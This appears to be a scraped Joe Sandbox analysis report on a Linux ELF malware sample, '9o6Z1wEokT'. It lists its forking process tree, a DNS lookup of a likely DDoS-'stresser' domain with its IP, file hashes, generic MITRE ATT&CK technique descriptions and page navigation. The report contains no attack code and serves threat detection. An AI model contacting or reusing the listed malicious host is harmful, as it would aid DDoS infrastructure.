Nov 1, 2021 10:08:27.576981068 CET	8.8.8.8	192.168.2.23	0x1680	No error (0)	scamanje.stresserit.pro		49.12.233.52	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

127.0.0.1:80

System Behavior

Analysis Process: 9o6Z1wEokT PID: 5241 Parent PID: 5121

General

Start time:	10:08:26
Start date:	01/11/2021
Path:	/tmp/9o6Z1wEokT
Arguments:	/tmp/9o6Z1wEokT
File size:	36468 bytes
MD5 hash:	68cb43368a1a8837125de604f0c2a11e

Analysis Process: 9o6Z1wEokT PID: 5242 Parent PID: 5241

General

Start time:	10:08:26
Start date:	01/11/2021
Path:	/tmp/9o6Z1wEokT
Arguments:	n/a
File size:	36468 bytes
MD5 hash:	68cb43368a1a8837125de604f0c2a11e

Analysis Process: 9o6Z1wEokT PID: 5243 Parent PID: 5242

General

Start time:	10:08:26
Start date:	01/11/2021
Path:	/tmp/9o6Z1wEokT
Arguments:	n/a
File size:	36468 bytes
MD5 hash:	68cb43368a1a8837125de604f0c2a11e

Analysis Process: 9o6Z1wEokT PID: 5244 Parent PID: 5242

General

Start time:	10:08:26
Start date:	01/11/2021
Path:	/tmp/9o6Z1wEokT
Arguments:	n/a
File size:	36468 bytes
MD5 hash:	68cb43368a1a8837125de604f0c2a11e

Analysis Process: 9o6Z1wEokT PID: 5245 Parent PID: 5242

General

Start time:	10:08:26
Start date:	01/11/2021
Path:	/tmp/9o6Z1wEokT
Arguments:	n/a
File size:	36468 bytes
MD5 hash:	68cb43368a1a8837125de604f0c2a11e

Analysis Process: 9o6Z1wEokT PID: 5246 Parent PID: 5242

General

Start time:	10:08:26
Start date:	01/11/2021
Path:	/tmp/9o6Z1wEokT
Arguments:	n/a
File size:	36468 bytes
MD5 hash:	68cb43368a1a8837125de604f0c2a11e

Analysis Process: 9o6Z1wEokT PID: 5247 Parent PID: 5242

General

Start time:	10:08:26
Start date:	01/11/2021
Path:	/tmp/9o6Z1wEokT
Arguments:	n/a
File size:	36468 bytes
MD5 hash:	68cb43368a1a8837125de604f0c2a11e

Analysis Process: 9o6Z1wEokT PID: 5248 Parent PID: 5242

General

Start time:	10:08:26
Start date:	01/11/2021
Path:	/tmp/9o6Z1wEokT
Arguments:	n/a
File size:	36468 bytes
MD5 hash:	68cb43368a1a8837125de604f0c2a11e

Analysis Process: xfce4-panel PID: 5251 Parent PID: 2063

General

Start time:	10:08:32
Start date:	01/11/2021
Path:	/usr/bin/xfce4-panel
Arguments:	n/a
File size:	375768 bytes
MD5 hash:	a15b657c7d54ac1385f1f15004ea6784

Analysis Process: wrapper-2.0 PID: 5251 Parent PID: 2063

General

Start time:	10:08:32
Start date:	01/11/2021
Path:	/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
Arguments:	/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
File size:	35136 bytes
MD5 hash:	ac0b8a906f359a8ae102244738682e76

Analysis Process: xfce4-panel PID: 5252 Parent PID: 2063

General

Start time:	10:08:32
Start date:	01/11/2021
Path:	/usr/bin/xfce4-panel
Arguments:	n/a
File size:	375768 bytes
MD5 hash:	a15b657c7d54ac1385f1f15004ea6784

Analysis Process: wrapper-2.0 PID: 5252 Parent PID: 2063

General

Start time:	10:08:32
Start date:	01/11/2021
Path:	/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
Arguments:	/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
File size:	35136 bytes
MD5 hash:	ac0b8a906f359a8ae102244738682e76

Analysis Process: xfce4-panel PID: 5253 Parent PID: 2063

General

Start time:	10:08:32
Start date:	01/11/2021
Path:	/usr/bin/xfce4-panel
Arguments:	n/a
File size:	375768 bytes
MD5 hash:	a15b657c7d54ac1385f1f15004ea6784

Analysis Process: wrapper-2.0 PID: 5253 Parent PID: 2063

General

Start time:	10:08:32
Start date:	01/11/2021
Path:	/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
Arguments:	/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
File size:	35136 bytes
MD5 hash:	ac0b8a906f359a8ae102244738682e76

Analysis Process: xfce4-panel PID: 5254 Parent PID: 2063

General

Start time:	10:08:32
Start date:	01/11/2021
Path:	/usr/bin/xfce4-panel
Arguments:	n/a
File size:	375768 bytes
MD5 hash:	a15b657c7d54ac1385f1f15004ea6784

Analysis Process: wrapper-2.0 PID: 5254 Parent PID: 2063

General

Start time:	10:08:32
Start date:	01/11/2021
Path:	/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
Arguments:	/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
File size:	35136 bytes
MD5 hash:	ac0b8a906f359a8ae102244738682e76

Analysis Process: wrapper-2.0 PID: 5275 Parent PID: 5254

General

Start time:	10:08:40
Start date:	01/11/2021
Path:	/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
Arguments:	n/a
File size:	35136 bytes
MD5 hash:	ac0b8a906f359a8ae102244738682e76

Analysis Process: xfpm-power-backlight-helper PID: 5275 Parent PID: 5254

General

Start time:	10:08:40
Start date:	01/11/2021
Path:	/usr/sbin/xfpm-power-backlight-helper
Arguments:	/usr/sbin/xfpm-power-backlight-helper --get-max-brightness
File size:	14656 bytes
MD5 hash:	3d221ad23f28ca3259f599b1664e2427

Analysis Process: xfce4-panel PID: 5255 Parent PID: 2063

General

Start time:	10:08:32
Start date:	01/11/2021
Path:	/usr/bin/xfce4-panel
Arguments:	n/a
File size:	375768 bytes
MD5 hash:	a15b657c7d54ac1385f1f15004ea6784

Analysis Process: wrapper-2.0 PID: 5255 Parent PID: 2063

General

Start time:	10:08:32
Start date:	01/11/2021
Path:	/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
Arguments:	/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
File size:	35136 bytes
MD5 hash:	ac0b8a906f359a8ae102244738682e76

Analysis Process: xfce4-panel PID: 5256 Parent PID: 2063

General

Start time:	10:08:32
Start date:	01/11/2021
Path:	/usr/bin/xfce4-panel
Arguments:	n/a
File size:	375768 bytes
MD5 hash:	a15b657c7d54ac1385f1f15004ea6784

Analysis Process: wrapper-2.0 PID: 5256 Parent PID: 2063

General

Start time:	10:08:32
Start date:	01/11/2021
Path:	/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0
Arguments:	/usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
File size:	35136 bytes
MD5 hash:	ac0b8a906f359a8ae102244738682e76

Analysis Process: dbus-daemon PID: 5274 Parent PID: 5273

General

Start time:	10:08:40
Start date:	01/11/2021
Path:	/usr/bin/dbus-daemon
Arguments:	n/a
File size:	249032 bytes
MD5 hash:	3089d47e3f3ab84cd81c48fd406d7a8c

Analysis Process: xfconfd PID: 5274 Parent PID: 5273

General

Start time:	10:08:40
Start date:	01/11/2021
Path:	/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
Arguments:	/usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
File size:	112880 bytes
MD5 hash:	4c7a0d6d258bb970905b19b84abcd8e9

Analysis Process: systemd PID: 5285 Parent PID: 1860

General

Start time:	10:08:46
Start date:	01/11/2021
Path:	/usr/lib/systemd/systemd
Arguments:	n/a
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Analysis Process: xfce4-notifyd PID: 5285 Parent PID: 1860

General

Start time:	10:08:46
Start date:	01/11/2021
Path:	/usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd
Arguments:	/usr/lib/x86_64-linux-gnu/xfce4/notifyd/xfce4-notifyd
File size:	112872 bytes
MD5 hash:	eee956f1b227c1d5031f9c61223255d1

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Linux Analysis Report 9o6Z1wEokT

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Process Tree

Yara Overview

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Jbx Signature Overview

AV Detection:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Runtime Messages

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

System Behavior

Analysis Process: 9o6Z1wEokT PID: 5241 Parent PID: 5121

General

Analysis Process: 9o6Z1wEokT PID: 5242 Parent PID: 5241

General

Analysis Process: 9o6Z1wEokT PID: 5243 Parent PID: 5242

General

Analysis Process: 9o6Z1wEokT PID: 5244 Parent PID: 5242

General

Analysis Process: 9o6Z1wEokT PID: 5245 Parent PID: 5242

General

Analysis Process: 9o6Z1wEokT PID: 5246 Parent PID: 5242

General

Analysis Process: 9o6Z1wEokT PID: 5247 Parent PID: 5242

General